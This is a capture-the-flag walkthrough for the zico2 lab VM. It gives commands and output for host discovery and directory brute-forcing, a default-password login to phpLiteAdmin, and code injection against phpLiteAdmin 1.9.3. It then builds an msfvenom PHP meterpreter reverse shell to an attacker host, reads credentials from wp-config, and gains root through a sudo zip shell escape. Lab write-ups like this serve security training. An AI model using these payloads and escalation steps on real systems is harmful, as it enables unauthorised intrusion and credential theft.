zico2
Recon:
Start off with netdiscover to find the host:
Currently scanning: Finished! | Screen View: Unique Hosts
6 Captured ARP Req/Rep packets, from 3 hosts. Total size: 360
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.171.1 00:50:56:c0:00:01 1 60 VMware, Inc.
192.168.171.135 00:0c:29:a2:b5:1b 2 120 VMware, Inc.
192.168.171.254 00:50:56:e5:61:61 3 180 VMware, Inc.
Next run nmap and find ports 22, 80, 111 open.
Time to run gobuster using wordlists generated from dirbuster and seclists:
screen -S gobuster go run ~/go/src/gobuster -w wordlistzico.txt -u http://192.168.171.135
// (Status: 200)
//js/ (Status: 200)
//css/ (Status: 200)
//?q=user/register/ (Status: 200)
//?q=user/login/ (Status: 200)
//?q=search/ (Status: 200)
//?q=user/password/ (Status: 200)
//?q=comment/reply/ (Status: 200)
//?q=node/add/ (Status: 200)
//?q=admin/ (Status: 200)
//index (Status: 200)
//img/ (Status: 200)
//?q=user/logout/ (Status: 200)
//?q=filter/tips/ (Status: 200)
//?level=12 (Status: 200)
//? (Status: 200)
/?&what= (Status: 200)
//?q=contact/ (Status: 200)
//?q=logout/ (Status: 200)
//?q=* (Status: 200)
//?msk (Status: 200)
//?favorites (Status: 200)
//?* (Status: 200)
//view.php (Status: 200)
/js (Status: 301)
/css (Status: 301)
/img (Status: 301)
/tools (Status: 200)
/index (Status: 200)
/view (Status: 200)
/dbadmin (Status: 301)
/vendor (Status: 301)
/package (Status: 200)
/LICENSE (Status: 200)
/img (Status: 301)
/index (Status: 200)
/package (Status: 200)
/view (Status: 200)
/tools (Status: 200)
The dbadmin loads up a sql web admin, try admin as the pass and login successfully.
Now to lookup this version of phpliteadmin, 1.9.3
searchsploit phpliteadmin
PHPLiteAdmin 1.9.3 - Remote PHP Code Injection | exploits/php/webapps/24044.txt
Looks like it worked after following steps from the exploit description and we have a way to get a reverse shell going.
Now to generate a PHP meterpreter script:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.171.136 LPORT=4444 R > shell.php
Now to get a shell onto the box by adding a malicious DB column:
Now get meterpreter running:
msfconsole
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.171.136
set LPORT 4444
exploit
Then hit the page in the browser.
After some grepping I found a WordPress install, check the config for user/passwords:
cat /home/zico/wordpress/wp-config | grep -i 'user' && cat /home/zico/wordpress | grep -i 'pass'
Try SSHing with the user/pass and succeed, next run LinEnum and linuxprivchecker.py, but none of the exploits reported seem to work, after a lot of head baning, check out the allowed/banned sudo commands this user has:
zico@zico:~$ sudo -l
Matching Defaults entries for zico on this host:
env_reset, exempt_group=admin, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zico may run the following commands on this host:
(root) NOPASSWD: /bin/tar
(root) NOPASSWD: /usr/bin/zip
sudo -u root zip /tmp/exploit.zip /tmp/exploit -T --unzip-comand="sh -c /bin/bash"
Get flag:
root@zico:~# cd /root/
root@zico:/root# ls
flag.txt
root@zico:/root# cat flag.txt
#
#
#
# ROOOOT!
# You did it! Congratz!
#
# Hope you enjoyed!
#
#
#
#